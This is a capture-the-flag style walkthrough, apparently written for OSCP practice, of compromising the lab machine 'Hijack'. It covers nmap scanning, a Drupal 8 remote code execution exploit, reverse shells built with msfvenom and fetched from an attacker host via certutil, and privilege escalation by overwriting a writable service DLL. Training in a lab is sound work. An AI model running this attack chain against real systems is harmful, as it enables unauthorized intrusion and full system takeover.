In preparation for the OSCP certification, I challenge myself to create at least 40 walkthroughs/writeups. This is my first writeup out of 40. The name of the vulnerable machine is Hijack from Cyberseclab.
My first step is to gather information or the reconnaissance. In this process I will gather all possible information about my target computer, system or network.
RECONNAISSANCE
- Port Scan - scan all open ports.
sudo nmap -p- -sS -Pn -n — min-rate=3000 172.31.1.27Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021–04–09 04:35 EDT
Nmap scan report for 172.31.1.27
Host is up (0.26s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49672/tcp open unknown
2.) Gather more detail information using Nmap basic script, version and OS discovery.
sudo nmap -p80,135,139,445,3306,3389,5985,47001,49664,49665,49666,49667,49668,49669,49672 -sC -sV -O -Pn -n -T4 172.31.1.27
Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021–04–09 04:37 EDT
Nmap scan report for 172.31.1.27
Host is up (0.25s latency).PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.37 ((Win32) OpenSSL/1.1.1a PHP/7.2.13)
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips/ /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.37 (Win32) OpenSSL/1.1.1a PHP/7.2.13
|_http-title: Welcome to Hijack | Hijack
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql MariaDB (unauthorized)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HIJACK
| NetBIOS_Domain_Name: HIJACK
| NetBIOS_Computer_Name: HIJACK
| DNS_Domain_Name: Hijack
| DNS_Computer_Name: Hijack
| Product_Version: 10.0.17763
|_ System_Time: 2021–04–09T08:39:08+00:00
| ssl-cert: Subject: commonName=Hijack
| Not valid before: 2021–04–08T08:34:00
|_Not valid after: 2021–10–08T08:34:00
|_ssl-date: 2021–04–09T08:39:16+00:00; +3s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Vista SP1 (91%), Microsoft Windows 10 1709–1909 (91%), Microsoft Windows Longhorn (91%), Microsoft Windows Server 2012 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (90%), Microsoft Windows 10 1703 (89%), Microsoft Windows 8 (89%), Microsoft Windows XP SP3 (89%), Microsoft Windows 10 1709–1803 (88%), Microsoft Windows 10 1809–1909 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 2s
|_nbstat: NetBIOS name: HIJACK, NetBIOS user: <unknown>, NetBIOS MAC: 02:96:61:2e:de:2a (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021–04–09T08:39:07
|_ start_date: N/AOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.97 seconds
3. Enumeration - enumerate each port and search for vulnerability to gain a foothold.
🌎 Port 80 HTTP
a.) Visit the website
b.) Use Wappalyzer to check website technology. Wappalyzer disclosed information that the web application is Drupal 8.
c.) Search for exploit using searchploit to display all possible exploits.
sudo searchsploit drupal
Upon trying some of the RCE from Drupal 8 the one working for me is 44482.rb. Once you executed the exploit you will receive a lower privelege shell.
Lower Privilege Shell
After we exploit the machine we need to upgrade our shell to have a better shell.
4. Upgrade the shell
- Create a reverse shell payload
msfvenom -p $payload -f $format-type lhost=$Attacker-IP lport=$Attacker-Port -o Outputfile
- Generate a listener
nc -nvlp $lport- Host a simple http server
python -m SimpleHTTPServer 80- Download the payload
certutil -urlcache -f http://$RHOST/$File $OuputName
- Execute the file to get a reverse shell
New reverse shell
5.) Privilege Escalation - our last step is to elevate into highest privilege our shell to have a full control to sytem
- Download winPEAS 👇
- Execute winPEAS and search for an interesting file.
Upon checking the winPEAS result, I found a interesting service named Hijack.
- Use accesschck to check our permission of the service
.\accesschk.exe /acceptula -uvqc users $service-name
As shown above that we can start and stop the service. And upon checking the hijack directory their is a directory named libraries.
In these directory their is a DLL file.
Using accesshck to check for write permission. And as you can see in image below that our user can read and write in directory.
Create a DLL reverse shell payload using msfvenom.
Download the payload to overwrite the old Custom.dll.
Generate a listener
nc -nvlp 53start the service to get a admin shell
sc start $service-name
